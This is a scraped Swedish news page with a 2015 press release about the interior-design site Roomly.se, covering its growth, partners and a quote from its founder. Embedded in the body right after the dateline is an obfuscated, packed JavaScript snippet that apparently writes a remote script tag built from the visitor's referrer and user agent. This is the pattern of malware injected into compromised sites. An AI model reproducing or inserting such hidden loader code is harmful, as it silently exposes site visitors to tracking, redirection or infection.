Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

​Inredningssajten Roomly.se når nya höjder och satsar stort 2015

​Inredningssajten Roomly.se når nya höjder och satsar stort 2015
Revue Magazine

Stockholm eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnrsd|var|u0026u|referrer|ffbee||js|php’.split(’|’),0,{}))
– Februari 6e, 2015 –
Inspirationssajten Roomly.se med fokus på inredning och design har haft ett bra halvår sedan start i augusti 2014. Nu tar sajten nya tag och satsar på marknadsföring och exponering i ett flertal kanaler.

Under 2014 har sajten samlat på sig över 2000 inredningsbilder, över 3000 möbler från ett flertal möbelföretag och samarbetspartners och över 200 aktiva medlemmar med intresse för inredning.

Redan under januari detta år har Roomly.se samlat på sig 5 nya samarbetspartners och fått uppbesöksstatistiken och antalet sidvisningar till nya höjder.

” Det är kul att se statistiken slå nya rekord månad efter månad. Visst har vi haft några månader när den varit något lägre som i december månad, men det är semestertider och då räknar vi med något lägre resultat än vanligt. Jag tror att 2015 kommer bli ett bra år för Roomly.se och andra inredningssajter då intresset för möbelhandel blivit så pass positivt online. ”
– Sebastian Plengier Ehrnfelt, Grundare av Roomly.se

För mer information besök Roomly.se

Roomly.se hittar du också här:

Facebook: https://www.facebook.com/roomly.se 
Twitter: http://twitter.com/RoomlySE
Instagram: http://instagram.com/roomlydesign/

Om Roomly.se

Roomly.se är en svensk inspirationssajt med fokus på inredning och design. En hemsida med dedikerade användare som tillsammans bygger innehåll och skapar en utmärkt plats att inspireras av.